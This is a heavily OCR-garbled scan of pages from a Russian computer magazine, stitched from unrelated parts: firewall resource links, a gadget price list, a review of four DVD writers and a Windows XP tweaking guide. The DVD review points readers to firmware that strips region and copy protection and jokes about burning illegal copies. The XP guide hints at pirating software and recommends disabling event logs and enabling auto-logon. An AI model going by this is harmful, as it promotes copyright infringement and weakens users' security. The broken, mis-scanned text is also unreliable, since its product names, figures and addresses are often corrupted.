сетей, защищенных брандмауэром. 
Да что говорить, ведь «...в основном 
эта публикация для технических ад- 
министраторов. ..», так что готовься - 
понять будет сложно, зато полезно. 


HTTP://WWW.SEGURITYFO- 
cus.cOM 

Ты не можешь не знать этот адрес, HO 
я все-таки скажу про этот архикле- 
вый ресурс, ведь здесь собрана одна 
из самых богатых коллекций всячес- 
ких багов и дырок (точнее - их опи- 
саний :)). Когда я ввел в поиск баг- 
трака слово «firewall», на меня выли- 
лось такое количество ссылок, что 
выплыл я из-под них только к утру :). 


hitp://www.rfc- 
editor.org/rfc/rfc793.txt 


Вещь, однозначно, хорошая, только 
поиск немного подтормаживает (и 
дизайн стремный - поиск искал ми- 
нуты две, наверное :)). 


HTTP://Www.LiB.RU/ 
SECURITY/ 

Хех, не раз, наверное, ты закачивал 
книженции из либы товарисча Мош- 
кова, но знаешь ли ты, что здесь при- 
сутствует и интересная нам сегодня 
тема - фаерволлы. Тут столько книги 
ссылок на различные источники с 
информацией, что хватит на очччень 
долгое чтение, причем присутствует 
и море инфы по обходу и ломанию 
этих самых фаерволлов. Дезигна, ко- 
нечно, нету никакого, даже о зада- 
нии фона странице веб-мастер не 
позаботился :), но все, бесспорно, 


hitp://www.securityfocus.com 
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ИНФА ПО ФАЙРВОЛЛИНГУ В СЕТИ 


hitp://www.knurr.ru/proj/solu- 
tions/experience.html 


восполняется самым бесценным в 
нашей жизни - информацией. 


НТТР://М/М/М/.ЕМТЕРАСТ.СОМ/— 
LSPITZ/INTRUSION.HTML 
Отличная статья по настройке поли- 
тики безопасности системы и отсле- 
живанию атак. Простым и понятным 
языком автор рассказывает об этих 
сложных вещах. В материале расска- 
зывается, как по логам фаерволла 
определить попытку вторжения на 
комп. Объясняется все на примере 
FireWall-1 и в конце даже прилагает- 
ся небольшой скриптик для отсылки 
почты при попытках атаки на хост. 
Инфа на фиглише, но один русский 


hitp://rtfm.vn.ua/inet/sec/nist/ 
index.htm 


хацкер взял да и перевел столь по- 
лезный материальчик - читай на 
http://www.void.ru/content/684. 


HTTP://WWW.RFG-EDITOR.ORG/ 
RFC/RFC793.TXT 

Hy и напоследок я тебе скажу - учи 
теорию, которой на сегодня является 
RFC793. Это спецификация протоко- 
ла ТСР, то есть правила общения, по 
которым компы коннектятся друг с 
другом. А если ты знаешь правила, то 
их легко можно нарушить или слегка 
поменять... под себя :), и не каждый 
фаерволл выдержит такой мощный 
напор, сложив лапки перед тобой - 
всемогущим сотрясателем тверди се- 
тевой :). 
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(Blizzard) Warcraft III 
Action Figure: Furion 
Stormrage 


Футболка черная с 
«Хакер Inside» 


(WestWood) 
Command & 
Conquer: Tiberian 
Sun Military Insignias 


(ORIGIN) Maelstrom 
(Ultima: The 
Technocrat War, 
Book 3) 


Final Fantasy X 
Figure: Seymour 


Final Fantasy: 
the Watch 


(Blizzard) Warcraft Ill 
Baseball Cap 


EverQuest: Zippo(R) 
Lighter - Dragon 
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Command & 
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Toshiba @ $699.99 
e740 


Sony Clie @ $240 
PEG-SJ20 
Handheld 


Video/ @ $59 
Pinnacle Systems 
Studio PCTV 


Headphones/ @ $110 
Sennheiser 
HD 265 
Vocal 
Headphones 


Jstck/ о $360 
Thrustmaster 


HOTAS Cougar 


Palm V @ $89.99 
Travel Kit 


Psion @ $500,95 
5mx 


Compaq @ $729,99 
iPaq H3970 


Spkrs/ @ $225 
VideoLogic 
DigiTheatre 

LC - Silver 


SanDisk @) $95.95 
128 MB 
CompactFlash 
Card 


Video/ @) $119 
Sigma Designs 
X-Card DVD/ 
DivX playback 


Sony CyberShot @® $1020 
OSC-F707 
5.2 Mpixel 
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тестирование пишущих О0\)-приводов [OVD 


Когда-то информацию хранили Ha перфокартах, и простенькая про- 
граммка на ассемблере весила несколько килограммов бумаги. После 
перехода на магнитную ленту все стали ходить с бобинами. И, нако- 
Hell, появились дискетки! Сначала они были размером с виниловую 
пластинку (восемь дюймов), потом с тетрадку (пять дюймов) и, нако- 
нец, 3,5 дюйма. При этом размер уменьшался, а объем хранимой на 
диске информации увеличивался. 

Похожая история произошла с граммофонными пластинками: снача- 
ла на одной пластинке умещалась одна песня, потом повысили плот- 
ность записи, и стало влезать около часа звуков. Потом снова немно- 
го помучились с пленкой и перешли на оптические диски. Сначала 
они были гигантскими (размером с грампластинку), а потом их 
уменьшили, и получился современный компакт-диск. Прежде всего, 
диск разрабатывали под аудио, но он хорошо прижился и в компью- 
терной индустрии. Оказалось, что на нем хорошо хранить не только 
аудио, но и данные. 

И, наконец, та же история происходит с видео: сначала мучались с ки- 
нопленкой (некоторые мучаются до сих пор), потом переползли на 
магнитную пленку и, наконец, решили переходить на оптические 
диски. Но видео занимает в несколько раз больше места, чем аудио! 
Поэтому пришлось на обычном компакт-диске (CD) увеличить плот- 
ность в несколько раз, так появился DVD - Digital Video Disk. Почему 
пошли именно таким путем? Во-первых, можно недорого перенала- 
дить производство компакт-дисков на видеодиски, во-вторых, можно 
недорого переделать оборудование под компакт-диски, и, в-третьих, 
оптика на сегодняшний день самый надежный и неприхотливый спо- 
соб хранения информации. Естественно, после того как получилось 
впихнуть на компакт-диск видео, дошло дело до компьютеров. Мно- 
гим уже нужна вместительная дискетка на 4,5 Гигабайта. После внед- 
рения в компьютерную область DVD стали называть Digital Versatile 
Disk, то есть универсальный цифровой диск. 


типы DVD 


DVD-ROM (Read Only Memory) - диск, который отпечатали на заводе, 
перезаписать его нельзя. В этом формате продаются диски с фильма- 
ми. DVD-ROM умеют проигрывать бытовые ОУ)-плееры, их умеют чи- 
тать компьютерные дисководы. 

DVD-RAM (Random Access Memory) - одни из первых О\УО-дисков, кото- 
рые можно записывать на компьютере. Преимущество в том, что бол- 
ванки достаточно дешевые, и их можно перезаписывать много раз. 
Сейчас постепенно вымирают из-за плохой совместимости с DVD- 
ROM. То есть и те и другие - DVD, только Ha DVD-ROM не посмотришь 
DVD-RAM, а на DVD-RAM не прочитаешь DVD-ROM. 

DVD-R/RW (Recordable/ReWritable) - подобно CD-R/RW записываемые 
и перезаписываемые диски. DVD-R можно записать только один раз, a 
DVD-RW можно записывать и стирать как дискетку около тысячи раз. 
Этот стандарт разработал ОУ)-форум. Его сторонники считают, что 
он менее глючный, потому что разрабатывался и тестировался много 
лет. А еще они считают, что он идеально совместим с большинством 
DVD-mneepos, то есть DVD-R/RW можно совать вместо DVD-ROM в обыч- 
ный бытовой ОУ)-плеер. Подробнее об этих ребятах ты узнаешь на 
сайте: http://www.dvdforum.org. 

DVD+R/RW - то же самое, что DVD-R/RW, только разработанный други- 
ми ребятами-конкурентами: DVD-anbaHcoM, который живет на сайте 
http://www.dvdrw.com. Несколько крупных фирм взбунтовались про- 
тив форума и придумали свой стандарт. И они также считают, что их 
DVD+R/RW полезет в обычный DVD-nneep. Стандарт очень молодой, в 
нем встречаются глюки, зато устройства DVD+R/RW на сегодняшний 
день более скоростные. 

Это как раз тот случай, когда конкуренция вредна для потребителя, 
ведь плюсовые DVD RW обычно несовместимы с минусовыми. То есть, 
если у тебя пишущий DVD с плюсом, а у твоего друга с минусом, то ме- 
няться дисками вы, скорее всего, не сможете! 


КАК НЕ ОСТАТЬСЯ В ДУРАКАХ ПРИ ПОКУПКЕ DVD? 

Современный DVD RW прежде всего должен хорошо читать обычные 
CD и DVD. Также он обязательно должен уметь записывать не только 
DVD, но и CD. Допустим, ты купил пишущий DVD, а у твоего друга есть 
только СЛ-дисковод. Если тебя не обманули, то твой DVD RW запишет 
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и обычную CD-R/RW болванку. Базовые возможности можно прове- 
рить программой Nero InfoTool, эта программа покажет всю инфу о 
дисководе. Качество чтения CD можно проверить Nero CDSpeed, a DVD 
- Nero DVDSpeed. Эти три программки ты можешь скачать бесплатно с 
сайта http://www.cdspeed2000.com. Они занимают 1 мегабайт в рас- 
пакованном виде и влезут на дискетку, которую ты можешь прихва- 
тить с собой в компьютерный магазин. На сайте они лежат в запако- 
ванном виде (500 кило). Мы использовали эти программы в нашем те- 
стировании, разобраться в них легко. 


Asus DVR-104 


По документа- 
ции Asus читает 
CD-ROM, CD-R, CD-RW с 
максимальной скоро- 
стью 24X, DVD-ROM читает со 
скоростью 6X, DVD-R, DVD+R, DVD- 
RW, DVD+RW читает со скоростью 2X. 
Умеет записывать DVD-R(2X), DVD- 
RW(1X), CD-R(8X), CD-RW(4X). 

В комплект входят диски DVD-RW, DV-R и программа для записи Nero 
Burning Room NERO Burning ROM версии 5.5.8, а также драйвера, 
шлейфы и болты. То есть сразу после покупки ты можешь приступить 
к записи DVD. 

Asus - машина тихоходная, поэтому шумит не сильно. Во время поис- 
ка трека чуть-чуть поскрипывает. 


Плохой CD-ROM 


Смотрим на картинку: зеленая ветка - Transfer Rate - то есть ско- 
рость считывания данных, а желтая ветка - скорость вращения 
диска. В поле Speed мы видим Average (среднюю) скорость переда- 
чи данных, начальную и конечную. Дисковод работает в режиме 
CAV (Constant Angular Velocity), то есть с постоянной угловой ско- 


в ЕЯ 


ча 
| = 
Pena | 


= ie oe 


ростью. Оттого и график такой - желтая линия прямая - TO есть 
диск вращается с постоянной скоростью. А зеленая линия - ско- 
рость передачи данных растет, это потому, что ближе к краю дис- 
ка радиус больше, и за то же время лазер проходит большую по- 


КОМБАЙНЫ DVD 


верхность, то есть больше успевает считать. Так скорость переда- 
чи разгоняется с восьми до восемнадцати X. График гладкий, ав 
среднем выходит 13X. То есть проблем с чтением китайских CD у 
Asus нет! Только дисковод отжирает аж 25% производительности 
(CPU usage) нашего Pintium-4. 


Хороший CD-ROM 


Теперь вставляем нормальный диск и видим, что какая-то разница 
есть: средняя скорость поднялась до 18Х, а процессор разгрузился 
до 14%. В обоих случаях ближе к краю Asus разогнался до обещан- 
ных 24Х. Параметр Seek time показывает время поиска нужного 
трека. Rendom - время поиска случайного трека, 1/3 - время поис- 
ка на дорожки в трети диска, которая ближе к краю, и full - полное 


a 


вительно, что сам фильм на компьютере смотреть одно удовольст- 
вие - никаких проблем. 


НУ 


Запись и чтение DUD-RW 


= На этом примере видно, как дисковод работает в режиме CLV, To есть 
__ м 
Г скорость вращения диска подстраивается под луч лазера так, чтобы 
= луч пробегал информационные ячейки с постоянной линейной ско- 
в ростью (Constant Linear Velocity). То есть чем дальше лазерный луч от 
: is центра диска, тем медленнее этот диск вращается. Поэтому зеленая 
линия (скорость считывания не меняется), а желтая линия (скорость 
Г = iz 
— 
время поиска трека. Это время показывает, сколько тебе нужно по- oo 
дождать, прежде чем дисковод найдет нужную дорожку, a значит = z= 
ры Г 
нужный файл. У оптических дисков это время большое - поэтому ой — 
они тормозят при частом обращении к разным файлам. ы 
om on 
oa 
= / = 
Запись и чтение СО-АШ и 
На приводе Asus мы записали диск CD-RW и решили протестировать, = 
как он сам его будет читать. И что же мы видим? Дисководу почти все is = 
= 
равно, какие диски читать. Любые CD Asus читает уверенно! И еще = 
Asus записал болванку так, что она читается без проблем. То есть он ные 
- —— 
И 
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вращения диска) уменьшается по мере движения луча от центра. Дис- 
ковод автоматически переключается в этот вражеский режим, как 
только почует внутри DVD-RW. Казалось бы, какая разница, DVD-ROM 
или DVD-RW? Но нет! Тот же «Микрокосмос», закатанный на DVD-RW, 
читается с неизменной скоростью 2X. Но вот записывать его при- 
шлось со скоростью 1Х без малого ЧАС! 


Чтение DUD+RW 


Привод хорош тем, что умеет читать не только родные DVD-RW, но и 
поддерживает чтения стандарта конкурентов DVD+RW. Причем, как мо- 
жешь убедиться, читает его как родной, на постоянной вражеской ско- 
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не только хорошо читает, HO и неплохо пишет перезаписываемые 
диски. 


Чтение DUD-ROM 


Для того чтобы протестировать качество считывания DVD, мы ис- 
пользовали качественный DVD-ROM с фильмом «Микрокосмос». 
График плавный, дисковод разгоняется до обещанных 6X. Не уди- 


test_lab выражает влагодарность 
компаниям "Остров Формоза", 
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Phillips Consumer Electronics рости 2X. Естественно, фильм можно посмотреть Ha компьютере, без 
Export B.U. ga предоставленное на каких-либо трудностей. Эту болванку мы записали на дисководе 

Philips. He очень понятно, почему «Микрокосмос» подрос где-то на Ги- 
тестуровануе оборудование. габайт, видимо, это связано с реализацией стандарта DVD+RW. Кстати, 
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это не значит, что фильм занял дополнительный гиг. Просто так видит 
DVDSpeed, а на самом деле там пусто и можно еще что-нибудь записать! 
Кстати, если ты приглядишься, то сможешь увидеть в заголовке про- 
шивку версии v1.20. На сайте http://www.firmware.com можно слить 
более свежую прошивку версии v1.32. Кстати, там же можно найти 
софт для отключения защиты от пиратов ;). 


Вывод 


Asus DVR-104 производит впечатление надежного продукта. Со всеми 
обещанными функциями справляется, да еще и совместим с конкури- 
рующим стандартом. Одинаково хорошо справляется с чтением раз- 
личных CD и DVD, записывает их корректно. 06 этом дисководе мож- 
но сказать: «Медленно, но верно». 


Philips DVDRW228 


Philips DVDRW228 06- 
ладает прикольным ди- 
зайном - моргает лампочка- 
ми как новогодняя елка. Одна 
лампочка загорается, когда внут- 

ри CD, а другая - когда внутри DVD. 

Посередине находится лампа, которая 

горит красным, когда Philips пишет, и си- 

ним, когда читает. 

Дисковод обещает записывать CD со скоростью 12X, а читать со ско- 
ростью 32X. DVD собирается записывать со скоростью 2,4X, а читать 
со скоростью 8Х. 

Кстати, при этих операциях Philips насвистывает, поскрипывает, гу- 
дит и вибрирует, не удивительно, ведь скорости-то большие! 

В комплекте две болванки (CD+RW и CD+R), софт для записи дисков и 
проигрывания DVD, шнуры, винты. 


Плохой CD-ROM 


Вставляем заюзанный китайский диск и что же мы видим? Видим мы ло- 
манную! Так работает метод P-CAV (Partial Constant Angular Velocity), т.е. 
дисковод пытается быстренько разогнаться до высокой скорости пере- 
дачи данных, а потом поддерживать ее в постоянном режиме. То есть это 
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комбинация CAV и CLV методов. Однако диск глючный, и скорость прихо- 
дится сбрасывать. Весь выигрыш теряется - вместо обещанных 32Х уда- 
ется разогнаться только до 24X, а потом снова приходится ее сбросить. 
Так что средняя скорость не намного выше Азиз’овского привода, всего 
16Х. Плохие компакты Philips DVDRW228 читает неважно! 


Хороший CD-ROM 
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Другое дело - качественный диск. Тут, переключившись Ha метод CAV, 
мы спокойно разгоняемся до обещанных 32X. А средняя скорость по- 
лучается 24Х. Очень хорошо, только процессор загрузил на 47%, и 
стоит такой гул, что уши вянут :(. 


Запись и чтение СО-АШ 


ali 


Болваночку зарезали очень быстро, все файлы на ней читаются. Запус- 
каем Nero CDSpeed, бабах: неустранимая ошибка. Стираем диск, записы- 
ваем снова, и снова ошибка в другом месте. Стираем, записываем на 
другом дисководе, все хорошо. Стираем, записываем на этом, и снова 
ошибка. Приходится сделать вывод, что Philips к работе с компакт-дис- 
ками приспособлен плохо. Возможно, неустранимая ошибка связана с 
конкретным диском или с багами программы, но у остальных дисково- 
дов почему-то никаких трудностей не возникает. 


Хороший DUD-ROM 


Ох, тяжела судьба сотрудников тестовой лаборатории, в который раз 
уже смотрим этот «Микрокосмос», наизусть уже выучили! Но ничего 
не поделаешь, нужно тестировать все дисководы на одном диске. Все 
очень хорошо, только до обещанных 8Х разогнаться не успели. 


Запись и чтение 0\/0+ВШ 
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Наконец-то закатывание на болванку очередной нелегальной копии 
«Микрокосмоса» стало делом нескольких минут. И снова смотрим 
фильм, и снова идеальная картинка DVD. В силу особенностей форма- 
та DVD+RW добавился лишний гиг, на нем-то Philips и сумел разо- 
гнаться до обещанных 8Х. Заметь, пожалуйста, что 8Х при чтении 
DVD-RW намного веселее, чем 2X. 


Выводы 


Итак, Philips DVDRW228 самый шумный из протестированных, 
очень быстрый, но не аккуратный. С чтением плохих компактов 
у него проблемы, с чтением CD, которые сам же и записал, тоже 
«неустранимые» сложности. Однако файлы прочитать удава- 
лось. Работа с DVD на пять с плюсом - очень быстро и очень каче- 
ственно. Тем, кто нацелен только на DVD, рекомендуем. 


Pioneer DVR-104 


Pioneer читает a 
CD-ROM, CD-R, CD-RW * 
с максимальной ско- $ Е 
ростью 24X, DVD-ROM чита- “ к 
ет со скоростью 6X, DVD-R, 
DVD+R, DVD-RW, DVD+RW читает 
со скоростью 2X. Умеет записывать 

DVD-R(2X), DVD-RW(1X), CD-R(8X), CD- 

RW(4X). Ham на растерзание достался ОЕМ’ный девайс, поэтому в ком- 
плекте кроме целлофанового пакета больше ничего не было ;). 

Этот ВУО’шный комбайн почему-то во время чтения немного поскри- 
пывает. Ну это уже как привыкнешь - каждый юзер приспосаблива- 
ется к фоновому шуму, издаваемому его железом, и через некоторое 
время перестает его замечать ;). А так шума совсем немного. 


Плохой CD-ROM 


С некачественным диском справляется хорошо - почти так же, как 32Х 
скоростной Philips. Даже на уродливом диске разгоняется до поло- 
женных 24Х. 


КОМБАЙНЫ DVD 


Этот дисковод не делит компакты на хорошие и плохие, все считыва- 
ются одинаково хорошо, с разгоном до обещанной скорости 24Х. Ac 
новой прошивкой удается меньше загружать процессор. 


Чтение и запись CD-RW 


Болванка хорошо нарезается, хорошо читается, с нормальной скоро- 
стью. Привод отлично работает с С-дисками :). 


На очередном считывании и просмотре «Микрокосмоса» Pioneer так 
же, как и Asus, все-таки чуть-чуть не успевает разогнаться до 6X. А 
так все великолепно. 
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Januch и чтение DUD-RU 


И вот опять на запись фильма «Микрокосмос» ушло около часа. Все- 
таки час это очень много! При чтении дисковод снова переключается 
в свой любимый тормозной режим CLV на скорости 2X. 
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Чтение 0\0+НШ 


= 


Формат конкурентов читается с такой же легкостью, как родной, но с 
той же ненавистно низкой скоростью 2X. Этот диск мы записали на 
Ricoh с глюком реализации DVD+RW, поэтому вместо того, чтобы про- 
сканировать последний пустой гигабайт, DVDSpeed выдает ошибку 
чтения сразу после 3,5 Гигабайт «Микрокосмоса». К сожалению, эта 
ошибка не помешала нам в который раз посмотреть фильм «Микроко- 
смос» с отменным качеством :). 


Вывод 


Pioneer DVR-104 - отличное решение для дома, так как он недорогой, под- 
держивает чтение обоих конкурирующих форматов DVD RW и надежно 
пишет DVD-RW и CD-RW. В домашних условиях тормознутость можно Tep- 
петь: поставил на запись и пошел спать/есть/заниматься своими делами. 


Ricoh MP5125A 
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Ricoh MP5125A отличается особой скромностью, ведь это самый тихий 
DVD RW в нашем тестировании, хотя работает с немалыми скоростя- 
ми. По документации он должен читать DVD со скоростью 8Х, а запи- 
сывать со скоростью 2.4X. CD Ricoh обещает записывать с максималь- 
ной скоростью 12Х, а читать со скоростью 32%. 


Плохой CD-ROM 


Ура! Происходит чтение левого сидюка с рекордно высокой скоро- 
стью 22Х, правда процессор загрузился не слабо :(. 


Хороший CD-ROM 
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Качественный диск позволяет поднять среднюю скорость до крейсер- 
ской 24X, но при этом враг ничего не услышит, так как ОУ)-привод 
работает очень тихо. 


Чтение и запись СО-ВШ 
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Болванка корректно записывается и так же корректно читается Ha 
высокой скорости, получается, что Ricoh очень хорошо приспособлен 
к записи и воспроизведению любых компакт-дисков. 


Чтение DUD 


Чтение DVD проходит великолепно, имеем обещанные 8X. Всех уже 
заколебавший «Микрокосмос» радует буйством красок и четкостью 
картинки. 


| 
у 
+} 
| 
% 
т 
a 
Е 


| 


tt 


#29 


Чтение u запись DUD+RU 


Запись проходит корректно и быстро, но во время сканирования регу- 
лярно появляется небольшой баг. Как только DVDSpeed преодолевает 


поверхность, занятую «Микрокосмосом», оно выдает ошибку чтения, 
вместо того чтобы продолжить сканировать пустой гигабайт либо оста- 
новиться. Вероятно, все дело в том, что в память залита древнющая про- 
шивка У1.06, когда уже давно имеется v.1.38. Однако просмотру DVD и 
другим операциям это совсем не мешает. Скорее баг давно уже исправ- 
лен, нужно только залить новую прошивку. 


Вывод 


Мы бы выбрали такой DVD RW, поскольку постоянно приходится работать 
с большими объемами данных: фотографии, картинки, верстка, игры. Все 
это занимает очень много места. Кстати, верстка Спеца, имхо, не влезает 
на CD-R, а вот Ha DVD-R уместилось бы, наверное, целых две. И, конечно, 
для нас важно время, часто нужно что-то записать очень быстро. Немало- 
важно, что Ricoh MP5125A отлично работает с CD, поскольку DVD пока есть 
не у всех. А небольшой баг мы бы быстро вылечили сменой прошивки :). 


ИТОГИ 


Мы протестировали массу параметров: от доступности треков до вре- 
мени открытия лотка. Однако самые важные параметры для нагляд- 
ности сведены в графики. 

Средние скорости чтения плохого сидирома, хорошего сидирома и 
перезаписываемого. Особо отличился Philips, который не смог прочи- 
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КОМБАЙНЫ DVD 


тать CD-ROM, который сам записал. Лучше всех Ricoh, Pioneer и Asus 
демонстрируют надежную работу. 
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На этом графике фирменный DVD с «Микрокосмосом» все читает поч- 
ти с одинаковой скоростью. Братья Pioneer и Asus снижают скорость 
чтения записываемых дисков до 2X. Зато они поддерживают оба DVD- 
формата - как плюс, так и минус. То есть если у тебя такой замечатель- 
ный привод, то ты всегда сможешь прочитать диск, принесенный тво- 
им другом. Для домашних дисководов это большой плюс. 
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Это просто слезный график, тут зафиксировано, как ненавистный 
«Микрокосмос» писался аж 47 минут. Причем «Микрокосмос» зани- 
мает только 3,5 Гигабайта, а представь, сколько будут писаться 4,5 Ги- 
габайта. Человеческой жизни на это не хватит! 


Это тестирование подтвердило старые истины, еще со времен 
первых CD-R/RW дисководов: 

1. Совместимость очень важна, все любят дискетки из-за того, что мож- 
но прийти с ними куда угодно и там найдется устройство считывания. 
(Фиг! Новые маки поставляются сейчас без флопов! Правда, я еще ни 
одного нового мака нигде не видел... :) - прим. ред.) Уже можно взять 
простенький DVD-ROM (который ТОЛЬКО читает DVD и CD) для компью- 
тера за 30-60 баксов, а простенький DVD-nneep для подключения к Te- 
левизору обойдется баксов в 80. Все чаще DVD-ROM включают в ком- 
плектацию новых компьютеров. Так что если у тебя будет пишущий 
DVD, ты в скором времени его сможешь считать/проиграть где угодно. 
2. Объем очень важен. Все ненавидят дискетки за то, что они малень- 
кие и легко портятся. На DVD-R/RW+R/RW влезает 4,7 гигабайта, при- 
чем эта цифра обещает подрасти. И потом они очень долговечны. 
Кроме того, все популярнее становятся цифровые видеокамеры - ло- 
гично хранить цифровые видеозаписи на цифровом диске, а не на не- 
надежной пленке с потерей качества. 

3. Качество очень приятно. Сравнивать рядовой DVD с рядовой видео- 
кассетой - то же самое, что сравнивать граммофонную пластинку с 
компакт-диском. DVD намного четче и ярче, у него больше разреше- 
ние, у него пятиканальный звук. 

4. Новые носители требуют новых ресурсов. Чтобы проигрывать DVD 
на компьютере, нужен мощный процессор не меныше Pentium-3 
500mhz, не меньше 256 метров памяти. А чтобы работать с записью 
собственного видео на DVD, необходимо минимум 5 гигабайт свобод- 
ного пространства на диске. 

5. Любые попытки создать антипиратскую/антихакерскую систему 
рождают массовые приступы пиратства. Для каждого из протестиро- 
ванных DVDRW на сайте http://www.firmware.com нашлась прошивка, 
снимающая ограничение на проигрывание дисков, привезенных из 
других стран. Любая школьница без особых навыков и затрат сможет 
тиражировать дома О\У)-диски. 
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ЭТО ПРОИЗОШЛО ПОЛГОДА НАЗАД. ПОСЛЕ ОЧЕРЕДНОГО 
ПАДЕНИЯ МИЛЛЕНИУМА Я РЕШИЛ ПОСТАВИТЬ ХР. «НУ БУДЕТ 
ТОРМОЗИТЬ, НУ И ЧЕРТ С НИМ, SATO В СТАБИЛЬНОСТИ 
ПРИБАВИТСЯ, ДА И НАЙДЕМ, КАК ЕГО ПОДСТРСИТЬ ПОД СЕБЯ», 
- TAK Я ТОГДА ДУМАЛ. НУ И ПОДСТРЗИЛ :). А ТЫ? ВСЕ ЕЩЕ 
НАБЛЮДАЕШЬ ЗА КРАСИВЫМИ СИНИМИ ОКОШКАМИ И 
СГЛАЖЕННЫМ ШРИФТОМ? И КАК СКОРОСТЬ? МДЯ... ТЯЖЕЛЫЙ 
СЛУЧАЙ :). ЕСЛИ ХОРОШАЯ - МОЖЕШЬ ДАЛЬШЕ НЕ ЧИТАТЬ (И 
ВООБЩЕ, ВАЛИ ОТСЮДА, БУРЖУЙ :)). ОСТАЛЬНЫЕ - ЗАСУЧИТЕ 
РУКАВА. РАБОТА ПРЕДСТОИТ НЕМАЛЕНЬКАЯ.... 


ЗАЧЕМ HAM РУКИ? 


Писать про тотальную настройку XP - дело 
неблагодарное. Слишком уж много опций - 
все-таки видно родство с win2k. Поэтому нас 
интересуют только скорость и удобство ра- 
боты с ХР, остальное оставим сисадминам 
(нет уж, не отмазывайся - не оставим сисад- 
минам, а просто отложим до следующего ра- 
за :) - прим. ред.). Что надо сделать в первую 
очередь? Красота, как известно, требует 
жертв, так что верни классический интер- 
фейс и отруби все эффекты (система > до- 
полнительно > быстродействие > обеспечить 
наилучшее быстродействие). Кажется, что 
связь стала медленнее - отруби QoS (выпол- 
нить > gpedit.msc > конфигурация компьюте- 
ра > административные шаблоны > сеть > 
диспетчер пакетов QoS > ограничить резер- 
вируемую пропускную способность). Отруби 
лишние службы, восстановление системы, 
журнал событий. Не бойся потратить день на 
настройку системы - потом это окупится бы- 
строй и безглючной работой. Ну и поставь 
твикеры. Какие - ты спросишь? Ну вот хотя 
бы... 


ЗАЧЕМ HAM ПРОГИ? 


Одним из первых настройщиков-украшателей 
для ХР был пакет PowerToys от самих мелко- 
мягких. Сам понимаешь, чего-то феноме- 
нального от этого продукта ждать не прихо- 
дится, хотя несколько полезных фишек все- 
таки есть. Во-первых, TweakUl - не так плох, 
кое-что полезное в нем есть. Во-вторых, про- 
двинутый калькулятор тоже может приго- 
диться (не та сад, конечно, но графики ри- 
сует неплохо). В-третьих, кому-то могут при- 
годиться виртуальные рабочие столы, кому- 
то генератор слайд-шоу, а лично я привык к 
замене alt-tab. Когда по нажатию этих кла- 
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виш появляются не только значки программ, 
но и превьющка окна - это очень удобно. Ка- 
чаем? С того же сайта 
(download.microsoft.com) можно скачать 
BootVis. Обещают уменьшение скорости за- 
грузки чуть ли не в два раза. Качай, в хозяй- 
стве пригодится. 


Кстати, ты знаешь, что за нами шпионят? 
Нет!? Тогда срочно качай XP-antispy (www.xp- 
antispy.de) и отрубай все гадости :). Их тут до- 
статочно много: от удаления надоевшего MS 
Messenger и автообновлений до активации 


WinXP. Только аккуратно: читай сноски и не 
удаляй все подряд: некоторые настройки на- 
зад можно вернуть только с переустановкой 
виндов. Я тебя предупредил :). 
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Ну что, винды больше не предлагают отпра- 
вить отчет об ошибке? Тогда приступаем к бо- 
лее серьезной настройке. Лезем на www.total- 
idea.com и качаем ТмеаКХР. Последняя версия 
на момент написания статьи - 2.0. Триальной 
версии хватит только на 30 запусков, хотя за 
это время реально настроить все, что нужно. 
Да и не мне тебя учить, как покупаются проги 
:). Что нам предлагают разработчики? Всего 
пять закладок: «System performance», «Tricks 
and tweaks», «Utilities», «Internet tweaks» и 
«Help and settings». Рассмотрим по порядку. В 
первом блоке меня больше всего заинтересо- 
вал «Cache optimization» - других нормальных 
способов выставить объем кэша под ХР я не 
знаю. Пригодится и чистильщик памяти: не 
фонтан, конечно, зато все рядом. В железных 
настройках тоже ничего примечательного, 
разве что оптимизация под тип процессора 
(что при этом конкретно меняется, хотелось бы 
мне узнать). Можешь еще заглянуть в 
«Unnecessary files» и удалить некоторые ком- 
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Пока что лучший твикер для ХР 


КСТАТИ, ТЫ ЗНАЕШЬ, ЧТО ЗА НАМИ 
шипионят? НЕТ!? ТогдА СРОЧНО 
КАЧАЙ XP-ANTISPY (WWW.XP-ANTISPY-DE) 


И ОТРУБАЙ ВСЕ ГАДОСТИ 7. 


поненты виндов, чтоб не мешались, и переле- 
зай на следующую закладку. Да, здесь уже на- 
много больше полезного. Как вылезешь из де- 
Open «Windows tweaks» (а полезняшек там 
много), обрати внимание на «auto-logon». Тебе 
не лень каждый раз вводить пароль при за- 
грузке? Тогда поставь автоматический вход в 
систему, благо переключиться на другого 
пользователя можно очень быстро (Win+L, ес- 
ли кто не знает). Можешь заглянуть в 
«MinimizerXP» - это реклама еще одного про- 
дукта. Небольшая программка добавляет зна- 
чок для сворачивания окна в трей. Жалко, что 
нельзя делать это по горячей клавише, наде- 
юсь, это сделают в новых версиях. А, тебе не 
надоела папка «Documents and settings»? Tor- 
да тебе прямая дорога в «System folders», и 
прописывай свои пути к системным папкам. 
Можешь еще попрятать диски, ярлыки в пуске 
и панели управления и выбрать тип сглажива- 


ния шрифта (а лучше его вообще отрубить, 
чтоб не тормозило), и перелезаем на следую- 
щий блок. «Windows utilites» - сноски на все хо- 
довые виндовые утилиты (я полагаю, ты и не 
подозревал, что их так много в поставке ХР :)). 
«File гепатег» - если тебе приходилось сталки- 
ваться с проблемой переименования несколь- 
ких сотен файлов, ты оценишь эту функцию. 
«File shredder» - эта фишка теперь стала попу- 
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лярной, видимо параноиков все больше :). Уда- 
ляет файлы без возможности восстановления. 
«Password generator» - а вот такую фишку ви- 
жу в первый раз. Тебе нужен генератор паро- 
лей? Тогда могу тебя обрадовать, здесь он до- 
вольно хороший. Ни за что не запомнишь :). 
Мамы могут заглянуть в «Program Censorship» 
и отрубить ребенку возможность играться, по- 
ка он не сделает домашнее задание. Данная 
фича отрубает запуск указанных программ. До 
кучи можно запретить доступ к некоторым 
папкам в «Folder protection», синхронизировать 
время и поставить будильник на отключение 


EXPERIENCE TWEAKER 


компа. A вот в «Registry cleaner» и «DiskDrive 
doctor» лезть He надо - я уже рассказывал про 
проги, которые справляются с этими задачами 
намного лучше. Параноики залезут в «Internet 
tweaks», почистят хистори, кэш ослика и пече- 
нье. Борцы за траффик включат блокировку 
баннеров и рорир’ов. Короче, работы всем хва- 
тит :). 


Ну, как прога? А между прочим, это только 
ОДИН из лучших твикеров для ХР. А вот дру- 
гой лидер проживает на www.tweaknow.com и 
отзывается на CustomizerXP. На первый 
взгляд программы очень похожи, разве что ин- 
терфейс у Customizer попроще. На второй 
взгляд понимаешь, что у TweakXP немного 
больше функций. Сам посуди: такие же наст- 
ройки интерфейса, настройки Интернета, ме- 
нюшек, удаление программ, запрет на запуск 
программ и пути к системным папкам. Разве 
что в поставку идет обрезанная версия Ват 
